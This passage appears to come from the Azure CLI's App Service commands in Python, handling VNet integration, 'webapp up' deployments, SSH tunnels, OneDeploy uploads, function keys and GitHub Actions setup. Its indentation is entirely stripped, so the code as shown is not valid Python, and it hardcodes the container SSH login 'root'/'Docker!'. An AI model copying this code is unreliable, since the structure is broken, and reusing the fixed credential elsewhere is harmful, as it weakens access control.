def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
subnet_resource_id = _validate_subnet(cmd.cli_ctx, subnet, vnet, resource_group_name)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnet_id_parts = parse_resource_id(subnet_resource_id)
subnet_subscription_id = subnet_id_parts['subscription']
vnet_name = subnet_id_parts['name']
vnet_resource_group = subnet_id_parts['resource_group']
subnet_name = subnet_id_parts['child_name_1']
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
from azure.cli.core.commands.client_factory import get_subscription_id
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
return_vnet = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_swift_virtual_network_connection', slot, swiftVnet)
    # Enable the Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
# reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise an error if the app's current OS differs from the detected or specified OS
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, loc, os_name, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we always call the ASP create or update API so that, in case of re-deployment, any updated SKU or plan
    # settings are applied as well
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
        # may need to update stack runtime settings. For node it's site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
                        settings.append('{}={}'.format(k, v))
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
    # workaround until the timeout limit issue for Linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
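# Builds the Kudu OneDeploy publish URL from the deployment parameters. Illustrative result (hypothetical values):
#   <scm_url>/api/publish?type=zip&async=True&restart=False&clean=True&path=/home/site/wwwroot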
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
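# The helper below interprets the artifact type from the file extension. Illustrative mapping (hypothetical
# file names): 'app.jar' -> 'jar', 'deploy.sh' -> 'startup', 'index.html' -> 'static'.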
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. You can track the ongoing deployment at {}"
.format(deployment_status_url))
    # check if an error occurred during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
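# Polls the tunnel server roughly once per second and gives up after 60 attempts (~1 minute) with an SSH timeout error.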
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
open_page_in_browser(scm_url + '/webssh/host')
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku.upper() in ['I1', 'I2', 'I3', 'I1V2', 'I2V2', 'I3V2']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
